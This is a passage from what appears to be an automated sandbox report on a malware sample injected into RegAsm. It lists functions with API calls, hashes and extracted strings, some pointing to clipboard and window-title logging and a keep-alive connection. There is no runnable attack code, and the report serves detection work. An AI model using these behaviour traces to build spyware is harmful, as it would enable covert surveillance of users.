                                                                                                                                  • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                                                                  • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                                                                  Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                                                                                  • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                                                                                  • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                                                                                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DisplayEnum$Devices$Monitors
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1432082543-0
                                                                                                                                  • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                  • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                                                                                  • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                                                                                  • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                                                                                  Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandleReadSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3642004256-0
                                                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                  Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                                                    • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                                                                  • String ID: [ $ ]
                                                                                                                                  • API String ID: 3309952895-93608704
                                                                                                                                  • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                                                  Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                                                                  Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                                                                  Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 39102293-0
                                                                                                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                                                                  Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                                                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2633735394-0
                                                                                                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                                                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                                                                                  Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                                                                                                                                  • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                                                                                                                                  • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                                                                                                                                  • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4116985748-0
                                                                                                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                                                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                                                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                                                                                  Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                                                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1761009282-0
                                                                                                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                  Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                  Function 0044569C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alloca_probe_16__freea
                                                                                                                                  • String ID: 8)3
                                                                                                                                  • API String ID: 1635606685-783258567
                                                                                                                                  • Opcode ID: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                                  • Opcode Fuzzy Hash: ad763113ce13b2b8e626d2ff443e146e726dc092d285a8402790d1a017a5485e
                                                                                                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                                  Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                  • API String ID: 1881088180-3686566968
                                                                                                                                  • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                  • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                  Function 10009807 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100098B1
                                                                                                                                  • GetLastError.KERNEL32(?,10009C44,?,00000000,?,00000000,00000000,?,00000000), ref: 100098DA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 442123175-2459865102
                                                                                                                                  • Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                                                                                                  • Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
                                                                                                                                  • Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                                                                                                                                  • Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
                                                                                                                                  Function 10009728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100097C3
                                                                                                                                  • GetLastError.KERNEL32(?,10009C64,?,00000000,?,00000000,00000000,?,00000000), ref: 100097EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 442123175-2459865102
                                                                                                                                  • Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                                                                                                  • Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
                                                                                                                                  • Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                                                                                                                                  • Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
                                                                                                                                  Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                  • String ID: image/png
                                                                                                                                  • API String ID: 1291196975-2966254431
                                                                                                                                  • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                  • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                  • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                  • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                  Strings
                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime
                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                  • API String ID: 481472006-1507639952
                                                                                                                                  • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                  • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                                                                                                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32 ref: 0041667B
